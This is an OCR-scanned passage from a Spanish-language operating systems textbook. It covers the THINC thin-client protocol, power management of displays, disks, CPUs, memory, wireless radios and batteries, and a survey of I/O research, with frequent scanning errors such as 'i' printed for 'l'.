cien sesión en otros sitios Web para realizar procesamiento de palabras, crear hojas de cálculo y otras 
cosas que solían requerir software de PC. Incluso es posible que, en un momento dado, el único soft¬ 
ware que ejecute la gente en su PC sea un navegador Web, y tal vez ni siquiera eso. 

Probablemente sea una conclusión justa decir que la mayoría délos usuarios desean una compu¬ 
tación interactiva de alto rendimiento, pero en realidad no quieren administrar una computadora. Es¬ 
to ha llevado a los investigadores a reexaminar la compartición de tiempo utilizando terminales 
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"tontas" (a las que ahora se conoce, en términos políticamente correctos, como clientes delgados) que 
cumplan con las expectativas de las terminales modernas. X fue un paso en esta dirección, y las ter¬ 
minales X dedicadas fueron populares durante un tiempo, pero perdieron popularidad porque costaban 
lo mismo que las PCs, podían hacer menos y de todas formas necesitaban cierto grado de manteni¬ 
miento del software. El descubrimiento del año sería un sistema de cómputo interactivo de alto ren¬ 
dimiento, en el que las máquinas de usuario no tuvieran software. Lo interesante es que esta meta 
se puede lograr. A continuación describiremos uno de estos sistemas de cliente delgado, conocido 
como THINC y desarrollado por los investigadores en la Universidad de Colombia (Baratto y co¬ 
laboradores, 2005; Kim y colaboradores, 2006; Lai y Nieh, 2006). 

La idea básica aquí es eliminar de la máquina cliente toda la inteligencia y el software, y utili¬ 
zarla sólo como una pantalla, donde todo el cómputo (incluyendo el proceso de construir el mapa 
de bits a mostrar) se realice del lado servidor. El protocolo entre el cliente y el servidor sólo indica 
a la pantalla cómo debe actualizar la RAM de video, y nada más. Se utilizan cinco comandos en el 
protocolo entre los dos lados. Estos comandos se listan en la figura 5-44. 


Comando 

Descripción 

Raw 

Muestra los datos de pixeles crudos, en una ubicación dada 

Copy 

Copia el área del búferde estructura a las coordenadas específicas 

Sfill 

Llena un área con un valor de color de pixel dado 

Pfill 

Llena un área con un patrón de pixeles dado 

Bitmap 

Llena una región utilizando una imagen de mapa de bits 


Figura 5-44. Los comandos de visualización del protocolo THINC. 


Ahora vamos a examinar los comandos. Rawse utiliza para transmitir los datos de los pixeles 
y hacer que se muestren directamente en la pantalla. En principio, éste es el único comando nece¬ 
sario. Los demás sólo son optimizaciones. 

copy instruye a la pantalla para que mueva datos de una parte de su RAM de video a otra par¬ 
te. Es útil para desplazar la pantalla sin tener que volver a transmitir todos los datos. 

sfiii llena una región de la pantalla con un solo valor de píxel. M uchas pantallas tienen un 
fondo uniforme en cierto color, y este comando se utiliza para generar primero el fondo, después 
del cual se pueden pintar texto, iconos y otros elementos. 

pfiii replica un patrón sobre una región. También se utiliza para los fondos, pero algunos son 
un poco más complejos que un solo color, en cuyo caso este comando realiza el trabajo. 

Por último, Bitmap también pinta una región, pero con un color de primer plano y un color de 
fondo. Con todo, estos son comandos muy simples, que requieren muy poco software del lado del 
cliente. Toda la complejidad de construir los mapas de bits que llenan la pantalla se llevan a cabo 
en el servidor. Para mejorar la eficiencia, se pueden agregar varios comandos en un solo paquete 
para transmitirlos a través de la red, del servidor al cliente. 

Del lado servidor, los programas gráficos utilizan comandos de alto nivel para pintar la panta¬ 
lla. Éstos son interceptados por el softwareTHlNC y se traducen en comandos que se pueden en¬ 
viar al cliente. Los comandos se pueden reordenar para mejorar la eficiencia. 
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El artículo proporciona muchas mediciones de rendimiento que ejecutan numerosas apiicacio- 
nes comunes en servidores ubicados a distancias que varían entre 10 km y 10,000 km dei ciiente. En 
generai, ei rendimiento fue superior a otros sistemas de red de área ampiia, inciuso para ei video 
en tiempo reai. Para obtener más información, consuite ios artícuios. 

5.8 ADMINISTRACIÓN DE ENERGÍA 

La primera computadora eiectrónica de propósito generai, ENIAC, tenía 18,000 tubos ai vacío y 
consumía 140,000 watts de energía. Como resuitado, generaba una factura de eiectricidad nada tri- 
viai. Después de ia invención dei transistor, ei uso de ia energía disminuyó en forma considerabie 
y ia industria de ias computadoras perdió ei interés en ios requerimientos de energía. Sin embargo, 
hoy en día ia administración de ia energía vueive a estar en ia mira por varias razones, y ei sistema 
operativo desempeña un papei aquí. 

Vamos a empezar con ias PCs de escritorio. A menudo, una PC de escritorio tiene una fuente 
de energía de 200 watts (que por io generai tiene una eficiencia de 85%; es decir, pierde ei 15% de 
ia energía entrante debido ai caior). Si se encienden 100 miñones de estas máquinas ai mismo tiem¬ 
po en todo ei mundo, en conjunto utiiizan 20,000 megawatts de eiectricidad. Ésta es ia producción 
totai de 20 piantas de energía nuciear de un tamaño promedio. Si se pudiera reducir a ia mitad ei re¬ 
querimiento de energía, podríamos deshacernos de 10 piantas nucieares. Desde ei punto de vista 
ambientai, deshacerse de 10 piantas de energía nuciear (o un número equivaientedepiantasdecom- 
bustibiefósii) es un gran avance y bien vaie ia pena tratar de iogrario. 

Ei otro sitio donde ia energía es una cuestión importante es en ias computadoras operadas por 
batería, inciuyendo ias notebooks, de boisiiio y iosWebpads, entre otras. Ei núcieo dei probiema es 
que ias baterías no pueden contener suficiente carga para durar mucho tiempo, cuando mucho ai- 
canzan unas horas. Además, a pesar de ios esfuerzos de investigación masivos por parte de ias em¬ 
presas de baterías, computadoras y eiectrónica para ei consumidor, ei progreso está detenido. Para 
una industria acostumbrada a dupiicar ei rendimiento cada 18 meses (ia iey de M oore), no tener nin¬ 
gún progreso parece como una vioiación de ias ieyes de ia física, pero ésa es ia situación actuai. Co¬ 
mo consecuencia, hacer que ias computadoras utiiicen menos energía de manera que ias baterías 
existentes duren más tiempo esdeaita prioridad para todos. Ei sistema operativo desempeña un im¬ 
portante papei aquí, como veremos a continuación. 

En ei nivei más bajo, ios distribuidores de hardware están tratando de hacer que sus componen¬ 
tes eiectrón i eos sean más eficientes en su uso de energía. Las técnicas utiiizadas inciuyen ia reducción 
dei tamaño de ios transistores, ei empieo de escaias de voitaje dinámicas, ei uso de buses adiabáticos 
con poca desviación y técnicas simiiares. Esto está fuera dei aicancedeesteiibro, pero ios iectores in¬ 
teresados pueden encontrar un buen estudio en un artícuio por Venkatachaiam y Franz (2005). 

Hay dos métodos generaies para reducir ei consumo de energía. Ei primero es que ei sistema 
operativo apague partes de ia computadora (en su mayoría, dispositivos de E/S) que no estén en uso, 
debido a que un dispositivo que está apagado utiiiza menos energía (o nada). Ei segundo método es 
que ei programa de apiicación utiiiee menos energía, io que posibiemente degradaría ia caiidad de 
ia experiencia dei usuario, para poder aiargar ei tiempo de ia batería. A naiizaremos cada uno de es¬ 
tos métodos en turno, pero primero habiaremos un poco acerca dei diseño dei hardware con respec¬ 
to ai uso de ia energía. 
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5.8.1 C uestiones de hardware 

Las baterías son de dos tipos generales: desechadles y recargables. Las baterías desechadles (entre 
las más comunes se cuentan las A A A, A A y D) se pueden utilizar para operar dispositivos de bol¬ 
sillo, pero no tienen suficiente energía como para operar computadoras notebook con grandes pan¬ 
tallas brillantes. Por el contrario, una batería recargable puede almacenar suficiente energía como 
para operar una notebook durante unas cuantas horas. Las baterías de níquel-cadmio solían domi¬ 
nar esta área, pero cedieron el paso a las baterías híbridas de níquel-metal, que duran más tiempo y 
no contaminan tanto el ambiente cuando se desechan. Las baterías de ion-litio son aún mejores, 
y se pueden recargar sin tener que drenarse por completo primero, pero su capacidad también es 
muy limitada. 

El método general que la mayoría de los distribuidores de computadoras utilizan para conser¬ 
var las baterías es diseñar la CPU, la memoria y los dispositivos de E/S para que tenga múltiples 
estados: encendido, inactivo, hibernando y apagado. Para utilizar el dispositivo, debe estar encen¬ 
dido. Cuando el dispositivo no se va a utilizar durante un tiempo corto se puede poner en inactivi¬ 
dad, lo cual reduce el consumo de energía. Cuando no se va a utilizar durante un intervalo mayor, 
se puede poner en hibernación, lo cual reduce el consumo de energía aún más. La concesión aquí 
es que para sacar a un dispositivo de hibernación a menudo se requiere más tiempo y energía que 
para sacarlo del estado inactivo. Por último, cuando un dispositivo se apaga, no hace nada y no con¬ 
sume energía. No todos los dispositivos tienen estos estados, pero cuando los tienen es responsabi¬ 
lidad del sistema operativo administrar las transiciones de estado en los momentos apropiados. 

A Igunas computadoras tienen dos o incluso tres botones de energía. U no de estos puede poner 
a toda la computadora en estado inactivo, del que se puede despertar rápidamente al teclear un ca¬ 
rácter o mover el ratón; otro botón puede poner a la computadora en estado de hibernación, del cual 
para despertarse requiere más tiempo. En ambos casos, estos botones por lo general no hacen nada 
más que enviar una señal al sistema operativo, que se encarga del resto en el software. En algunos 
países los dispositivos eléctricos deben, por ley, tener un interruptor de energía mecánico que inte¬ 
rrumpa un circuito y retire la energía del dispositivo, por razones de seguridad. Para cumplir con 
esta ley, tal vez sea necesario otro interruptor. 

La administración de la energía hace que surjan varias preguntas con las que el sistema opera¬ 
tivo debe lidiar. M uchas de ellas se relacionan con la hibernación de los recursos (apagar los dispo¬ 
sitivos en forma selectiva y temporal, o al menos reducir su consumo de energía mientras están 
inactivos). Las preguntas que se deben responder incluyen las siguientes: ¿Qué dispositivos se pue¬ 
den controlar? ¿Están encendidos/apagados, o tienen estados intermedios? ¿Cuánta energía se aho¬ 
rra en los estados de bajo consumo de energía? ¿Se gasta energía al reiniciar el dispositivo? ¿Debe 
guardarse algún contexto cuando se pasa a un estado de bajo consumo de energía? ¿Cuánto se re¬ 
quiere para regresar al estado de energía máxima? Desde luego que las respuestas a estas pregun¬ 
tas varían de dispositivo en dispositivo, por lo que el sistema operativo debe ser capaz de lidiar con 
un rango de posibilidades. 

Varios investigadores han examinado las computadoras notebook para ver a dónde va la ener¬ 
gía. Li y colaboradores (1994) midieron varias cargas de trabajo y llegaron a la conclusión que se 
muestra en la figura 5-45. Lorch y Smith (1998) hicieron mediciones en otras máquinas y llegaron 
a las conclusiones que se muestran en la figura 5-45. Weisery colaboradores (1994) también hicie- 


SECCION 5.8 


ADMINISTRACION DE ENERGIA 


419 


ron mediciones, pero no pubiicaron ios vaiores numéricos. Simpiemente indicaron que ios princi- 
paies tres consumidores de energía eran ia pantaiia, ei disco duro y ia CPU, en ese orden. Aunque 
estos números no están muy cerca unos de otros, posibiemente debido a ias distintas marcas de 
computadoras que se midieron sin duda tienen distintos requerimientos de energía, se ve ciaro que 
ia pantaiia, ei disco duro y ia CPU son objetivos obvios para ahorrar energía. 


Dispositivo 

L¡ y colaboradores (1994) 

Lorch y Smith (1998) 

Pantalla 

68% 

39% 

CPU 

12% 

18% 

Disco duro 

20% 

12% 

Módem 


6% 

Sonido 


2% 

Memoria 

0.5% 

1% 

Otros 


22% 


Figura 5-45. Consumo de energía de varias partes de una computadora notebook. 


5.8.2 C uestiones del sistema operativo 

Ei sistema operativo desempeña un papei ciave en ia administración de ia energía. Controia todos 
ios dispositivos, por io que debe decidir cuái apagar y cuándo hacerio. Si apaga un dispositivo y és¬ 
te se iiega a necesitar rápidamente, puede haber un moiesto retraso mientras se reinicia. Por otra 
parte, si espera demasiado para apagar un dispositivo, ia energía se desperdicia. 

Ei truco es buscar aigoritmosy heurística que permitan ai sistema operativo tomar buenas de¬ 
cisiones sobre i o que se va a apagar y cuándo se debe hacer. Ei probiema es que "buenas" es muy 
subjetivo. Un usuario puede encontrar aceptabie que después de 30 segundos de no utiiizar ia compu¬ 
tadora, se requieran 2 segundos para que ésta responda a una puisación de tecias. A otro usuario ie 
puede parecer muy moiesto bajo ias mismas condiciones. En ia ausencia de entrada de audio, i a 
computadora no puede distinguir entre estos dos usuarios. 

La pantalla 

Ahora veamos ios dispositivos que gastan ia mayor parte de ia energía, para ver qué se puede ha¬ 
cer ai respecto. Ei principai demento consumidor de energía es ia pantaiia. Para obtener una ima¬ 
gen nítida y bridante, ia pantaiia debe tener iuz posterior, y eso requiere una energía considerabie. 
Muchos sistemas operativos tratan de ahorrar energía aquí ai apagar ia pantaiia cuando no hay 
actividad durante cierto número de minutos. A menudo, ei usuario puede decidir cuái va a ser ei in- 
tervaio de desconexión, con io cuai se deja ai usuario ia eiección entre tener ia pantaiia en bianco 
frecuentemente y agotar ia batería rápidamente (y tai vez ei usuario no desee tener que hacer esta 
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elección). Apagar la pantalla es un estado de inactividad, debido a que se puede regenerar (a partir 
de la RAM de video) casi en forma instantánea, cuando se oprime una tecla o se mueve el disposi¬ 
tivo señal ador. 

Flinn y Satyanarayanan (2004) propusieron una posible mejora. Sugirieron hacer que la panta¬ 
lla consista en cierto número de zonas que se pueden apagar o encender de manera independiente. 
En la figura 5-46 se ilustran 16 zonas, utilizando líneas punteadas para separarlas. Cuando el cursor 
se encuentra en la ventana 2, como se muestra en la figura 5-46(a), sólo se tienen que encender las 
cuatro zonas en la esquina inferior derecha. Las otras 12 pueden estar apagadas, con lo cual se aho¬ 
rran 3/4 de la energía de la pantalla. 

Cuando el usuario mueve el cursor a la ventana 1, se pueden apagar las zonas para la ventana 
2 y las zonas detrás de la ventana 1 se pueden encender. Sin embargo, como la ventana 1 se extien¬ 
de por 9 zonas, se necesita más energía. Si el administrador de ventanas puede detectar lo que está 
ocurriendo, puede mover de manera automática la ventana 1 para que se acomode en 4 zonas, con 
un tipo de acción de ajuste automático a la zona, como se muestra en la figura 5-46(b). Para lograr 
esta reducción de 9/16 de la energía máxima a 4/16, el administrador de ventanas tiene que com¬ 
prender la administración de energía, o ser capaz de aceptar instrucciones de alguna otra pieza del 
sistema que lo haga. Algo más sofisticado sería la habilidad de iluminar en forma parcial una ven¬ 
tana que no esté completamente llena (por ejemplo, una ventana que contenga líneas cortas de tex¬ 
to se podría mantener apagada en la parte derecha). 
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(a) (b) 

Figura 5-46. El uso dezonas para iluminar la pantalla por la parte posterior, (a) Cuan¬ 
do se selecciona la ventana 2 no se mueve, (b) Cuando se selecciona la ventana 1, se 
mueve para reducir el número de zonas iluminadas. 


El disco duro 

Otro de los principales villanos es el disco duro. Requiere una energía considerable para mantener¬ 
se girando a una alta velocidad, incluso aunque no haya accesos. M uchas computadoras, en espe¬ 
cial lasnotebooks, hacen que el disco deje de girar después de cierto número de segundos o minutos 
de inactividad. Cuando se necesita otra vez, se vuelve a arrancar. Por desgracia, un disco detenido 
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está en hibernación en vez de inactividad, ya que se requieren unos cuantos segundos para hacer 
que vueiva a girar, io cuai produce retrasos consi derabies para ei usuario. 

Además, ai reiniciar ei disco se consume una energía adicionai considerabie. Como consecuen¬ 
cia, cada disco tiene un tiempo característico (T^) que representa su punto muerto, a menudo en ei ran¬ 
go de 5 a 15 segundos. Suponga que ei siguiente acceso ai disco se espera durante cierto tiempo t en 
ei futuro. Si t <1^, se requiere menos energía para mantener ei disco girando que para apagado y des¬ 
pués voiver a encenderio rápidamente. Si t > T^, ia energía que se ahorra hace que vaiga ia pena apa¬ 
gar ei disco y voiver a encenderio mucho después. Si se pudiera hacer una buena predicción (por 
ejempio, con base en ios patrones de acceso anteriores), ei sistema operativo podría hacer buenas pre¬ 
dicciones para apagar dispositivos y ahorrar energía. En ia práctica, ia mayoría de ios sistemas son 
conservadores y sóio detienen ei disco hasta después de unos cuantos minutos de inactividad. 

Otra forma de ahorrar energía dei disco es tener una caché de disco de un tamaño considerabie 
en ia RAM . Si se necesita un bioque que se encuentra en ia caché, no hay que reiniciar un disco 
inactivo para satisfacer ia iectura. De manera simiiar, si sepuedecoiocar en ei búfer deia caché una 
escritura en ei disco, no hay que reiniciar a un disco detenido sóio para reaiizar ia escritura. Ei dis¬ 
co puede permanecer apagado hasta que se iiene ia caché u ocurra un faiio en ia iectura. 

Otra forma de evitar arranques innecesarios dei disco es que ei sistema operativo mantenga in¬ 
formados a ios programas acerca dei estado dei disco, enviándoies mensajes o señaies. A igunos pro¬ 
gramas tienen escrituras discrecionaies que se pueden omitir o retrasar. Por ejempio, un procesador 
de paiabras se puede configurar para que escriba ei archivo que se está editando ai disco cada cier¬ 
to número de minutos. Si ei procesador de pai abras sabe que ei disco está apagado en ei momento 
en que normaimente escribiría ei archivo, puede retrasar esta escritura hasta que ei disco se vueiva 
a encender, o hasta que haya transcurrido cierto tiempo adicionai. 

LaCPU 

L a C PU también se puede administrar para ahorrar energía. LaCPU de una notebook se puede po¬ 
ner en estado inactivo mediante software, con io cuai se reduce ei uso de ia energía a casi cero. Lo 
único que puede hacer en este estado es despertarse cuando ocurra una interrupción. Por io tanto, 
cada vez que ia CPU está inactiva, ya sea en espera de E/S o debido a que no tiene nada que hacer, 
pasa ai estado inactivo. 

En muchas computadoras hay una reiación entre ei voitajede ia CPU, ei cicio de reioj y ei uso 
de ia energía. A menudo ei voitaje de ia CPU se puede reducir mediante software, io cuai ahorra 
energía pero también reduce ei cicio de reioj (aproximadamente en forma iineai). Como ia energía 
consumida es proporcionai ai cuadrado dei voitaje, ai reducir ei voitaje a ia mitad ia CPU se vuei- 
ve ia mitad de rápida, pero a 1/4 de ia energía. 

Esta propiedad se puede expiotar para ios programas con tiempos de entrega bien definidos, como 
ios visores de muitimedia que tienen quedescomprimir y mostrar un cuadro cada 40 mseg, pero se vuei- 
ven inactivos si io hacen con más rapidez. Suponga que una CPU utiiiza xjouies mientras está en eje¬ 
cución a toda veiocidad durante 40 mseg, y x/4 jouies cuando opera a ia mitad de ia veiocidad. Si un 
visor de muitimedia puede descomprimir y mostrar un cuadro en 20 mseg, ei sistema operativo puede 
operar con ia máxima energía durante 20 mseg y después apagarse por 20 mseg, para un uso totai 
de energía de x/2 jouies. De manera aiternativa, puede operar a ia mitad de ia energía y sóio hacer ia 
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entrega, pero usar sólo x/4 joules. En la figura 5-47 se muestra una comparación entre ia operación a 
máxima veiocidad y máxima energía durante cierto intervaio de tiempo, y ia operación a ia mitad de ia 
veiocidad y un cuarto de ia energía por un intervaio dei dobie de tiempo. En ambos casos sereaiiza ei 
mismo trabajo, pero en ia figura 5-47(b) sóio se consume ia mitad de ia energía ai reaiizario. 

1.00 - 
0.75 - 
I 0.50 - 

0.25 - 


T/2 T 0 T/2 T 

Tiempo —► Tiempo —► 

(a) (b) 

Figura 5-47. (a) Operación a máxima velocidad, (b) Recorte de voltaje por dos, de la 
velocidad por dos y del consumo de energía por cuatro. 

De manera similar, si el usuario está escribiendo a 1 carácter/segundo, pero el trabajo necesa¬ 
rio para procesar el carácter requiere 100 mseg, es mejor que el sistema operativo detecte los exten¬ 
sos periodos de inactividad y reduzca la velocidad de la CPU por un factor de 10. En resumen, es 
más eficiente operar a una menor velocidad que a una mayor velocidad. 

La memoria 

Existen dos opciones posibles para ahorrar energía con la memoria. En primer lugar, la caché se 
puede vaciar y después apagarse. Siempre se puede volver a cargar de la memoria principal sin pér¬ 
dida de información. La recarga se puede realizar en forma dinámica y rápida, por lo que apagar la 
caché es por completo un estado de inactividad. 

Una opción más drástica es escribir el contenido de la memoria principal en el disco y después 
apagar la memoria principal en sí. Este método es la hibernación, ya que se puede cortar casi toda la 
energía a la memoria a expensas de un tiempo de recarga considerable, en especial si el disco tam¬ 
bién está apagado. Cuando se apaga la memoria, la CPU tiene que apagarse también, o tiene que eje¬ 
cutarse de la ROM . Si la CPU está apagada, la interrupción que la despierta tiene que hacer que salte 
al código en la ROM, de manera que la memoria se pueda recargar antes de utilizarla. A pesar de to¬ 
da la sobrecarga, desconectar la memoria durante largos periodos (horas) puede valer la pena si es 
más conveniente reiniciar en unos cuantos segundos que tener que reiniciar el sistema operativo del 
disco, lo cual a menudo requiere de un minuto o más. 

Comunicación inaiámbrica 

Cada vez hay más computadoras portátiles con una conexión inalámbrica al mundo exterior (por 
ejemplo. Internet). El transmisor y receptor de radio requeridos son a menudo grandes consumido¬ 
res de energía. En especial, si el receptor de radio siempre está encendido para escuchar el correo 
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electrónico entrante, la batería se puede agotar con mucha rapidez. Por otra parte, si el radio se apa¬ 
ga después de, por ejemplo, 1 minuto de estar inactivo, se podrán perder los mensajes entrantes, lo 
cual sin duda es indeseable. 

Kravetsy Krishnan (1998) han propuesto una solución eficiente para este problema. El núcleo 
de su solución explota el hecho de que las computadoras móviles se comunican con estaciones de 
base fija que tienen grandes memorias y discos, sin restricciones de energía. Lo que proponen es 
hacer que la computadora móvil envíe un mensaje a la estación base cuando esté a punto de desco¬ 
nectar el radio. De ahí en adelante, la estación de radio coloca en un búfer los mensajes entrantes 
en su disco. Cuando la computadora móvil vuelve a encender el radio, se lo hacesaber a la estación 
base. En ese momento se le puede enviar cualquier mensaje acumulado. 

Los mensajes salientes que se generan cuando el radio está apagado se colocan en un búfer en 
la computadora móvil. Si el búfer amenaza con llenarse, el radio se enciende y la cola se transmite 
a la estación base. 

¿Cuándo debe apagarse el radio? Una posibilidad es dejar que el usuario o el programa de apli¬ 
cación lo decidan. Otra es apagarlo después de varios segundos de inactividad. ¿Cuándo debe vol¬ 
ver a encenderse? De nuevo, el usuario o programa podría decidir, o se podría encender en forma 
periódica para comprobar el tráfico entrante y transmitir los mensajes en cola. Desde luego que tam¬ 
bién debería encenderse cuando el búfer de salida esté a punto de llenarse. También son posibles 
otras heurísticas. 


Administración térmica 

Una cuestión algo distinta, pero que también está relacionada con la energía, es la administración 
térmica. Las CPUs modernas se calientan en extremo debido a su alta velocidad. Los equipos de es¬ 
critorio por lo general tienen un ventilador eléctrico interno para sacar el aire caliente del chasis. 
Como la reducción del consumo de energía comúnmente no es una cuestión preponderante con los 
equipos de escritorio, normalmente el ventilador está encendido todo el tiempo. 

Con las notebooks, la situación es distinta. El sistema operativo tiene que monitorear la tempe¬ 
ratura en forma continua. Cuando se acerca a la temperatura máxima permisible, el sistema opera¬ 
tivo tiene que tomar una decisión. Puede encender el ventilador, que hace ruido y consume energía. 
De manera alternativa puede reducir el consumo de energía al reducir la luz posterior de la panta¬ 
lla, reducir la velocidad de la CPU, ser más agresivo y desconectar el disco, o algo similar. 

Cierta entrada por parte del usuario podría ser valiosa como guía. Por ejemplo, un usuario po¬ 
dría especificar por adelantado que el ruido del ventilador es objetable, por lo que el sistema ope¬ 
rativo reduciría el consumo de energía en su defecto. 


Administración de baterías 

En los viejos tiempos, una batería sólo proporcionaba corriente hasta que se agotaba, momento en el 
cual se detenía. Esto ya no es así; actualmente, las laptops utilizan baterías inteligentes que se pue¬ 
den comunicar con el sistema operativo. Si se les solicita, pueden informar su máximo voltaje, el vol¬ 
taje actual, la máxima carga, la carga actual, la máxima proporción de agotamiento, la proporción de 
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agotamiento actual y mucho más. La mayoría de las computadoras notebook tienen programas que 
se pueden ejecutar para consultar y mostrar todos estos parámetros. A las baterías inteligentes tam¬ 
bién se les puede instruir para que cambien varios parámetros operacionales bajo el control del sis¬ 
tema operativo. 

Algunas notebooks tienen varias baterías. Cuando el sistema operativo detecta que una batería 
está a punto de agotarse por completo, tiene que arreglar un cambio a la siguiente batería, sin que 
se corte la energía durante la transición. Cuando la última batería está a punto de agotarse, depen¬ 
de del sistema operativo advertir al usuario y después realizar un apagado ordenado: por ejemplo, 
asegurándose que el sistema de archivos no se corrompa. 


I nterfaz de drivers 

El sistema Windows tiene un mecanismo elaborado para realizar la administración de energía, co¬ 
nocido como ACPI (Advanced Configuration and Power Interface, Interfaz avanzada de configu¬ 
ración y energía). El sistema operativo puede enviar a cualquier controlador que cumpla con este 
mecanismo por medio de comandos para pedir que reporte las capacidades de sus dispositivos y sus 
estados actuales. Esta característica es muy importante cuando se combina con los dispositivos 
"plug and play", ya que justo después de iniciarse, el sistema operativo ni siquiera sabe qué dispo¬ 
sitivos hay presentes, y mucho menos sus propiedades con respecto al consumo de energía o a su 
capacidad de administración de la misma. 

También puede enviar comandos a los controladores para pedirles que reduzcan sus niveles de 
energía (con base en las capacidades que detectó antes, desde luego). También hay cierto tráfico en 
el sentido contrario. En especial cuando un dispositivo como un teclado o un ratón detecta activi¬ 
dad después de un periodo de inactividad, ésta es una señal para el sistema de que debe regresar a 
la operación (casi) normal. 

5.8.3 C uestiones de los programas de aplicaciones 

Hasta ahora hemos analizado las formas en que el sistema operativo puede reducir el uso de ener¬ 
gía por parte de varios tipos de dispositivos. Pero también hay otro método: indicar a los programas 
que utilicen menos energía, aun si esto significa proporcionar una experiencia más pobre al usuario 
(es mejor una experiencia más pobre que ninguna experiencia, cuando la batería se agota y las lu¬ 
ces se apagan). Por lo general, esta información se pasa cuando la carga de la batería está por de¬ 
bajo de cierto valor de umbral. Después es responsabilidad délos programas decidir entre degradar 
el rendimiento para extender la vida de la batería, o mantener el rendimiento y arriesgarse a que¬ 
darse sin energía. 

U na de las preguntas que surge aquí es acerca de cómo puede un programa degradar su rendi¬ 
miento para ahorrar energía. Esta pregunta ha sido estudiada por Flinn y Satyanarayanan (2004). 
Ellos proporcionaron cuatro ejemplos de cómo el rendimiento degradado puede ahorrar energía. 
Ahora los analizaremos. 

En este estudio, la información se presenta al usuario en varias formas. Cuando no hay degra¬ 
dación se presenta la mejor información posible. Cuando hay degradación, la fidelidad (precisión) 
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de la información que se presenta ai usuario es peor de io que hubiera podido ser. En breve vere¬ 
mos ejempios de esto. 

Para poder medir ei uso de ia energía, Fiinn y Satyanarayanan idearon una herramienta de soft¬ 
ware iiamada PowerScope. Lo que hace es proporcionar un perfii de uso de energía de un programa. 
Para usario, una computadora debe estar conectada a una fuente de energía externa a través de un mui- 
tímetro digitai controiado por software. Mediante ei uso dei muitímetro, ei software puede ieer ei 
número de miiiamperes que provienen de ia fuente de energía y así determinar ia energía instantánea 
que está consumiendo ia computadora. Lo que hace PowerScope es muestrear en forma periódica ei 
contador dei programa y ei uso de energía, y escribir estos datos en un archivo. Una vez que ha ter¬ 
minado ei programa, se anai iza ei archivo para obtener ei uso de energía de cada procedimiento. Es¬ 
tas mediciones formaron ia base de sus observaciones. También se utiiizaron mediciones en ei ahorro 
de energía dei hardware y formaron ia iínea de base con ia que se midió ei rendimiento degradado. 

Ei primer programa que se midió fue un reproductor de video. En modo no degradado, repro¬ 
duce 30 cuadros/segundo en resoiución compieta y a coiores. Una forma de degradación es aban¬ 
donar ia información de coior y mostrar ei video en bianco y negro. Otra forma de degradación es 
reducir ia veiocidad de ios cuadros, que produce parpadeos y proporciona a ia peiícuia una caiidad 
inferior. Otra forma más de degradación es reducir ei número de pixeies en ambas direcciones, ya 
sea reduciendo ia resoiución espaciai o ia imagen a mostrar. Las mediciones de este tipo ahorraron 
aproximadamente 30% de ia energía. 

Ei segundo programa fue un reconocedor de voz. Reaiizaba un muestren dei micrófono para 
construir una forma de onda ia cuai podía anaiizarse en ia computadora notebook o enviarse a tra¬ 
vés de un eniace de radio para anaiizaria en una computadora fija. Ai hacer esto se ahorra ener¬ 
gía de ia CPU, pero se utiiiza energía para ei radio. La degradación se iogró ai utiiizar un 
vocabuiario más pequeño y un modeio acústico más simpie. La ganancia aquí fue de aproxima¬ 
damente un 35%. 

Ei siguiente ejempio fue un visor de mapas que obtenía ei mapa a través dei eniace de radio. 
La degradación consistía en recortar ei mapa en medidas más pequeñas, o indicar ai servidor remo¬ 
to que omitiera ios caminos más pequeños, requiriendo así menos bits para transmitir. De nuevo, 
aquí se obtuvo una ganancia de 35%. 

Ei cuarto experimento fue con ia transmisión de imágenes] PEG a un navegador Web. Ei es¬ 
tándar j PEG permite varios aigoritmos para intercambiar ia caiidad de ia imagen con ei tamaño dei 
archivo. Aquí, ia ganancia promedio fue desóio 9%. Inicuso así, en generai ios experimentos mos¬ 
traron que ai aceptar cierta degradación de ia caiidad, ei usuario puede trabajar más tiempo en una 
batería dada. 

5.9 INVESTIGACIÓN ACERCA DE LA E/S 

Hay una cantidad considerabie de investigación acerca de ia entrada/sai ida, pero ia mayoría está en¬ 
focada en dispositivos específicos, en vez deia E/S en generai. A menudo, ei objetivo es mejorar ei 
rendimiento de una manera u otra. 

Los sistemas de disco son uno de ios casos en cuestión. Los aigoritmos de programación dei 
brazo dei disco son un área de investigación siempre popuiar (Bachmaty Braverman, 2006; y Za- 
randioonyThomasian, 2006), ai iguai que ios arregios de discos (A man y coi aboradores, 2007). La 
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optimización de ia ruta compieta de E/S también es de interés (Riska y coi aboradores, 2007). Tam¬ 
bién hay investigación sobre ia caracterización de ia carga de trabajo dei disco (Riska y Riedei, 
2006). Una nueva área de investigación reiacionada con ios discos son ios discos fiash de aito ren¬ 
dimiento (Birreii y coiaboradores, 2007; y Chang, 2007). L os controiadores de dispositivos también 
están obteniendo cierta atención necesaria (Baii y coiaboradores, 2006; Ganapathy y coiaboradores, 
2007; Padioieau y coiaboradores, 2006). 

Otra nueva tecnoiogía de aimacenamiento es M EM S (M icro-Eiectricai-M echanicai Systems, 
Sistemas micro eiectromecánicos), que pueden reempiazar (o ai menos compiementar) a ios discos 
(Rangaswami y coiaboradores, 2007; y Yu y coiaboradores, 2007). Otra área de investigación pro¬ 
metedora es cómo hacer ei mejor uso de ia CPU dentro dei controiador de disco; por ejempio, pa¬ 
ra mejorar ei rendimiento (Gurumurthi, 2007) o para detectar virus (Paui y coiaboradores, 2005). 

Aigo sorprendente es que ei modesto reioj sigue siendo un tema de investigación. Para proveer 
una buena resoiución, aigunos sistemas operativos operan ei reioj a 1000 Hz, io cuai produce una 
sobrecarga consi derabie. La investigación se enfoca en cómo deshacerse de esta sobrecarga (Etsion 
y coiaboradores, 2003; Tsafiry coiaboradores, 2005). 

Los Chentes dei gados también son un tema de consi derabie interés (Kissier y Hoyt, 2005; Rits- 
chard, 2006; Schwartz y Gerrazzi, 2005). 

Dado ei gran número de científicos computacionaies con computadoras notebooks y ei micros¬ 
cópico tiempo de batería en ia mayoría de eiios, no debe sorprender que haya un enorme interés en 
cuanto ai uso de técnicas de software para reducir ei consumo de energía. Entre ios temas especiaii- 
zados que se están anai izando se encuentran: escribir código de apiicaciones para maximizar ios tiem¬ 
pos de inactividad dei disco (Sony coiaboradores, 2006), hacer que ios discos giren a menor veiocidad 
cuando se utiiicen poco (Gurumurthi y coiaboradores, 2003), utiiizar modeios de programa para pre¬ 
decir cuándo se pueden desconectar ias tarjetas inaiámbricas (Hom y Kremer, 2003), ahorro de ener¬ 
gía para VolP (Gieeson y coiaboradores, 2006), examinare) costo de energía de ia seguridad (Aaraj y 
